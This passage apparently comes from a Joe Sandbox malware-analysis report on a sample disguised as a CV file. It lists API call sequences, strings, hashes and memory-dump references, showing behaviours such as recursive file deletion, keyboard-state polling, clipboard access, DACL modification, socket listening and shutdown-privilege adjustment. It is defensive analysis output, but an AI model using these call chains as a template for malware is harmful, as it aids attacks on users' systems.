                                                                                            • _wcscpy.LIBCMT ref: 00110B0B
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00110B4A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                            • String ID: *.*
                                                                                            • API String ID: 3566783562-438819550
                                                                                            • Opcode ID: 85d239bfac12ae2d5123de5257badeaefee4f3e532c243bfdceb4371f690ddd3
                                                                                            • Instruction ID: a71a666533f09f55176a1e7d9f8f0102599cf295672a751ac29119f0cad43c6b
                                                                                            • Opcode Fuzzy Hash: 85d239bfac12ae2d5123de5257badeaefee4f3e532c243bfdceb4371f690ddd3
                                                                                            • Instruction Fuzzy Hash: A46159765082059FCB14DF60C844EAEB3E8FF99314F04492EF989D7252DB71EA85CB92
                                                                                            APIs
                                                                                              • Part of subcall function 000FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000FABD7
                                                                                              • Part of subcall function 000FABBB: GetLastError.KERNEL32(?,000FA69F,?,?,?), ref: 000FABE1
                                                                                              • Part of subcall function 000FABBB: GetProcessHeap.KERNEL32(00000008,?,?,000FA69F,?,?,?), ref: 000FABF0
                                                                                              • Part of subcall function 000FABBB: HeapAlloc.KERNEL32(00000000,?,000FA69F,?,?,?), ref: 000FABF7
                                                                                              • Part of subcall function 000FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000FAC0E
                                                                                              • Part of subcall function 000FAC56: GetProcessHeap.KERNEL32(00000008,000FA6B5,00000000,00000000,?,000FA6B5,?), ref: 000FAC62
                                                                                              • Part of subcall function 000FAC56: HeapAlloc.KERNEL32(00000000,?,000FA6B5,?), ref: 000FAC69
                                                                                              • Part of subcall function 000FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000FA6B5,?), ref: 000FAC7A
                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000FA6D0
                                                                                            • _memset.LIBCMT ref: 000FA6E5
                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000FA704
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 000FA715
                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 000FA752
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000FA76E
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 000FA78B
                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000FA79A
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 000FA7A1
                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000FA7C2
                                                                                            • CopySid.ADVAPI32(00000000), ref: 000FA7C9
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000FA7FA
                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000FA820
                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000FA834
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                            • String ID:
                                                                                            • API String ID: 3996160137-0
                                                                                            • Opcode ID: d777b5bd3872b48099df1e7dd14b395cf3f8c52027dece610468983655187916
                                                                                            • Instruction ID: 6ea3ecbbb6101ccb3975ab73476054d8b86cafa0e6b161fc20292e938aba9e56
                                                                                            • Opcode Fuzzy Hash: d777b5bd3872b48099df1e7dd14b395cf3f8c52027dece610468983655187916
                                                                                            • Instruction Fuzzy Hash: CB515CB5A0020AABDF10DF90DC44EFEBBB9FF0A300F048129F915A7651DB749946DB61
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                            • API String ID: 0-4052911093
                                                                                            • Opcode ID: 073983e85f33ddfcefd01aacb901802d2af5b6217483f60ea6b0c1f0b864910e
                                                                                            • Instruction ID: f09cad11036065ff7479118e6ab205a6faa207beb435c656ef608028864ef9c1
                                                                                            • Opcode Fuzzy Hash: 073983e85f33ddfcefd01aacb901802d2af5b6217483f60ea6b0c1f0b864910e
                                                                                            • Instruction Fuzzy Hash: 34726471E04219DBDB28CF98C880BADB7B5BF44310F54816EE919EB291DB709E81DF94
                                                                                            APIs
                                                                                              • Part of subcall function 00106EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00105FA6,?), ref: 00106ED8
                                                                                              • Part of subcall function 001072CB: GetFileAttributesW.KERNEL32(?,00106019), ref: 001072CC
                                                                                            • _wcscat.LIBCMT ref: 00106441
                                                                                            • __wsplitpath.LIBCMT ref: 0010645F
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00106474
                                                                                            • _wcscpy.LIBCMT ref: 001064A3
                                                                                            • _wcscat.LIBCMT ref: 001064B8
                                                                                            • _wcscat.LIBCMT ref: 001064CA
                                                                                            • DeleteFileW.KERNEL32(?), ref: 001064DA
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 001064EB
                                                                                            • FindClose.KERNEL32(00000000), ref: 00106506
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                            • String ID: \*.*
                                                                                            • API String ID: 2643075503-1173974218
                                                                                            • Opcode ID: d70d15d45e707c197292a6300d9431b1397573dcb927986d7a8b0dc29dbf17cc
                                                                                            • Instruction ID: 67e5ba6ae28b28a1ef1e9280b5d62f35dfc184763763dd165837897728ec8bcd
                                                                                            • Opcode Fuzzy Hash: d70d15d45e707c197292a6300d9431b1397573dcb927986d7a8b0dc29dbf17cc
                                                                                            • Instruction Fuzzy Hash: 5E3180B2408388AEC721DBA48C859DBB7DCAF56310F44092EF6D9C3182EB75D54987A7
                                                                                            APIs
                                                                                              • Part of subcall function 00123C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00122BB5,?,?), ref: 00123C1D
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0012328E
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0012332D
                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001233C5
                                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00123604
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00123611
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1240663315-0
                                                                                            • Opcode ID: e0a85ed0eed713925ab2a71d89a23b65efeab428ce416c2a938d152cb70e62c2
                                                                                            • Instruction ID: 5cefcf1793f56faa881c7438b385c7897307c3219c02c7013853203aab803026
                                                                                            • Opcode Fuzzy Hash: e0a85ed0eed713925ab2a71d89a23b65efeab428ce416c2a938d152cb70e62c2
                                                                                            • Instruction Fuzzy Hash: DBE15A35604210AFCB14DF28D895E6EBBE8FF89310B04856DF45ADB2A2DB34EE15CB51
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?), ref: 00102B5F
                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00102BE0
                                                                                            • GetKeyState.USER32(000000A0), ref: 00102BFB
                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00102C15
                                                                                            • GetKeyState.USER32(000000A1), ref: 00102C2A
                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00102C42
                                                                                            • GetKeyState.USER32(00000011), ref: 00102C54
                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00102C6C
                                                                                            • GetKeyState.USER32(00000012), ref: 00102C7E
                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00102C96
                                                                                            • GetKeyState.USER32(0000005B), ref: 00102CA8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: State$Async$Keyboard
                                                                                            • String ID:
                                                                                            • API String ID: 541375521-0
                                                                                            • Opcode ID: 32aced0c07d571c8269001bc26221920e6c4730777c90ebc9bb70a3971db1e49
                                                                                            • Instruction ID: 963fd1ab119193acfda35365bc0df0c54560cb385a7834ccdd8c7b42afe6cd08
                                                                                            • Opcode Fuzzy Hash: 32aced0c07d571c8269001bc26221920e6c4730777c90ebc9bb70a3971db1e49
                                                                                            • Instruction Fuzzy Hash: 9141A5346047C96DFF359B649A0C3B9BEA06F12354F04805ED9C65A6C2EFF499C8C7A2
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1737998785-0
                                                                                            • Opcode ID: 8d174d5c4f3c7ba0c239c35fc10676e877730033c9083915faa21b71bece3726
                                                                                            • Instruction ID: cd0a52a45dfbc69dd36c73de9286de07e549036e9ebf11786b4c300495a533e1
                                                                                            • Opcode Fuzzy Hash: 8d174d5c4f3c7ba0c239c35fc10676e877730033c9083915faa21b71bece3726
                                                                                            • Instruction Fuzzy Hash: 3C219C35300210AFDF05AFA5EC49BAD77A8EF55710F01802AF94ADB2A1DB71ED818B95
                                                                                            APIs
                                                                                              • Part of subcall function 000F9ABF: CLSIDFromProgID.OLE32 ref: 000F9ADC
                                                                                              • Part of subcall function 000F9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 000F9AF7
                                                                                              • Part of subcall function 000F9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 000F9B05
                                                                                              • Part of subcall function 000F9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000F9B15
                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0011C235
                                                                                            • _memset.LIBCMT ref: 0011C242
                                                                                            • _memset.LIBCMT ref: 0011C360
                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0011C38C
                                                                                            • CoTaskMemFree.OLE32(?), ref: 0011C397
                                                                                            Strings
                                                                                            • NULL Pointer assignment, xrefs: 0011C3E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                            • String ID: NULL Pointer assignment
                                                                                            • API String ID: 1300414916-2785691316
                                                                                            • Opcode ID: e4b3780aeb5a7acc8fdb8f664c4a0ad89347b39d96afd190c5e26acf0d6c58bd
                                                                                            • Instruction ID: fab4fb353a5e1dca45e3299cf71a2d6fe4e9c0d162a2da5b1b57a446266289af
                                                                                            • Opcode Fuzzy Hash: e4b3780aeb5a7acc8fdb8f664c4a0ad89347b39d96afd190c5e26acf0d6c58bd
                                                                                            • Instruction Fuzzy Hash: 81912A71D00219ABDB14DFE4DC91EEEBBB9EF08710F10816AF519A7291EB705A45CFA0
                                                                                            APIs
                                                                                              • Part of subcall function 000FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000FB180
                                                                                              • Part of subcall function 000FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000FB1AD
                                                                                              • Part of subcall function 000FB134: GetLastError.KERNEL32 ref: 000FB1BA
                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00107A0F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                            • String ID: $@$SeShutdownPrivilege
                                                                                            • API String ID: 2234035333-194228
                                                                                            • Opcode ID: b12a52760c2f98070b67add8fe51f2fdbc104756a97babc3efa8c5029f85f076
                                                                                            • Instruction ID: 52221d07c99346507e9312c46fb53ae4249addc2d0c45d94ac1559a0395a538e
                                                                                            • Opcode Fuzzy Hash: b12a52760c2f98070b67add8fe51f2fdbc104756a97babc3efa8c5029f85f076
                                                                                            • Instruction Fuzzy Hash: 6F01D475B58211AAEB285668DC5ABBF72589B01340F294824B993A30D2DBE46E0081A0
                                                                                            APIs
                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 00118CA8
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118CB7
                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00118CD3
                                                                                            • listen.WSOCK32(00000000,00000005), ref: 00118CE2
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118CFC
                                                                                            • closesocket.WSOCK32(00000000), ref: 00118D10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                            • String ID:
                                                                                            • API String ID: 1279440585-0
                                                                                            • Opcode ID: 965cb182a69b2c4b97cb11048cc09882765b82c18cffeedcd2a25d721856ad39
                                                                                            • Instruction ID: 22cf50d3c86b62adfa45465ccaa4b662705226ee432f5fce4c1f62205b6fce9d
                                                                                            • Opcode Fuzzy Hash: 965cb182a69b2c4b97cb11048cc09882765b82c18cffeedcd2a25d721856ad39
                                                                                            • Instruction Fuzzy Hash: ED2107356002019FCB14EF68DC45FAEB7A9EF49324F108169F956A73E2CB70AD81CB51
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00106554
                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00106564
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00106583
                                                                                            • __wsplitpath.LIBCMT ref: 001065A7
                                                                                            • _wcscat.LIBCMT ref: 001065BA
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 001065F9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                            • String ID:
                                                                                            • API String ID: 1605983538-0
                                                                                            • Opcode ID: 400eff8b681597895531b4a79c0b2734a3c9555808a200b23e5489e9cce2f8ff
                                                                                            • Instruction ID: c730c4790be4bffadf5d1aba3caa3250e012b8e6eb5120bc84eddb53086c1036
                                                                                            • Opcode Fuzzy Hash: 400eff8b681597895531b4a79c0b2734a3c9555808a200b23e5489e9cce2f8ff
                                                                                            • Instruction Fuzzy Hash: 09219571900258ABDF20ABA4DC88BDDB7BCAB09340F5000A5F545E3181E7B19F85CB60
                                                                                            APIs
                                                                                              • Part of subcall function 0011A82C: inet_addr.WSOCK32(00000000), ref: 0011A84E
                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00119296
                                                                                            • WSAGetLastError.WSOCK32(00000000,00000000), ref: 001192B9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastinet_addrsocket
                                                                                            • String ID:
                                                                                            • API String ID: 4170576061-0
                                                                                            • Opcode ID: a3622d7aaf95e6d596a8c5f98d39eb86c0e22e2398c1381b22d16859b0de5e1d
                                                                                            • Instruction ID: 7a0ce976244986f9023000ba36c7387236369da7aa8708c141a772d5c25c8038
                                                                                            • Opcode Fuzzy Hash: a3622d7aaf95e6d596a8c5f98d39eb86c0e22e2398c1381b22d16859b0de5e1d
                                                                                            • Instruction Fuzzy Hash: FD41BC70600200AFDB14AB68C892EBE77EDEF44724F14855DF956AB3D3CB749E418BA1
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0010EB8A
                                                                                            • _wcscmp.LIBCMT ref: 0010EBBA
                                                                                            • _wcscmp.LIBCMT ref: 0010EBCF
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0010EBE0
                                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0010EC0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 2387731787-0
                                                                                            • Opcode ID: bb40610fe58541efc948b53ac848b25379b255587582fa6dc6da59b8cdd39b22
                                                                                            • Instruction ID: d9618510922d80a4eb7444e8bbc174a66efc2084f66e156f8efe5e2d61f3b4a0
                                                                                            • Opcode Fuzzy Hash: bb40610fe58541efc948b53ac848b25379b255587582fa6dc6da59b8cdd39b22
                                                                                            • Instruction Fuzzy Hash: 8341C175600702DFDB18DF28C490A9AB3E4FF49314F10495EF99A8B3A1DB72E940CB51
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                            • String ID:
                                                                                            • API String ID: 292994002-0
                                                                                            • Opcode ID: cd95972ef6a5bc7d2e3dd949de8b976f697b6fe3cc26127553010e93d0c03cd3
                                                                                            • Instruction ID: 24cbe39dfd8bb6e6108169345ebfed9cef5910c8d494642ff6170f38f3eda54d
                                                                                            • Opcode Fuzzy Hash: cd95972ef6a5bc7d2e3dd949de8b976f697b6fe3cc26127553010e93d0c03cd3
                                                                                            • Instruction Fuzzy Hash: 7211B2313012216FEB216F26EC44F6FBB99EF55760B050429F849D7292CF70A96286A5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
